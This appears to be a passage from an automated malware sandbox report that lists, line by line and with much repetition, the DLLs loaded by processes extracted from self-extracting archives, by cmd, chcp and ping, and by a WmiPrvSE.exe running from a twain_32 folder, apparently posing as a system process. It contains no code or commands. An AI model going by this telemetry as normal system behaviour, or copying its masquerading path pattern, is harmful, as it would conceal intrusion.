Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: mscoree.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: mswsock.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: cryptsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rsaenh.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: cryptbase.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: napinsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wshbth.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: nlaapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dnsapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winrnr.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winnsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: amsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasapi32.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasman.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rtutils.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winhttp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: uxtheme.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: propsys.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: apphelp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dlnashext.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wpdshext.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: edputil.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: urlmon.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: iertutil.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: srvcli.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: netutils.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wintypes.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: appresolver.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: slc.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: sppc.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: mscoree.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: mswsock.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: cryptsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rsaenh.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: cryptbase.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: napinsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wshbth.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: nlaapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dnsapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winrnr.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winnsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: amsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasapi32.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasman.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rtutils.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winhttp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: uxtheme.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: propsys.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: apphelp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dlnashext.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wpdshext.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: edputil.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: urlmon.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: iertutil.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: srvcli.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: netutils.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wintypes.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: appresolver.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: slc.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: sppc.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: mscoree.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: mswsock.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: cryptsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rsaenh.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: cryptbase.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: napinsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wshbth.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: nlaapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dnsapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winrnr.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winnsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: amsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasapi32.dll
